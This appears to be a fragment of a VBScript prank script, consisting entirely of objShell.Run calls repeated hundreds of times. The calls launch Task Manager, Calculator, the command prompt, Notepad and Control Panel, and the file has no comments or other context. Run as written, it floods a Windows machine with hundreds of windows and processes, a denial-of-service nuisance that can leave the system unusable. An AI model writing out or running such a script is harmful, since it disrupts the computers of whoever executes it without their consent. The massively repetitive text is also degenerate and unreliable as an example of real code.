objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

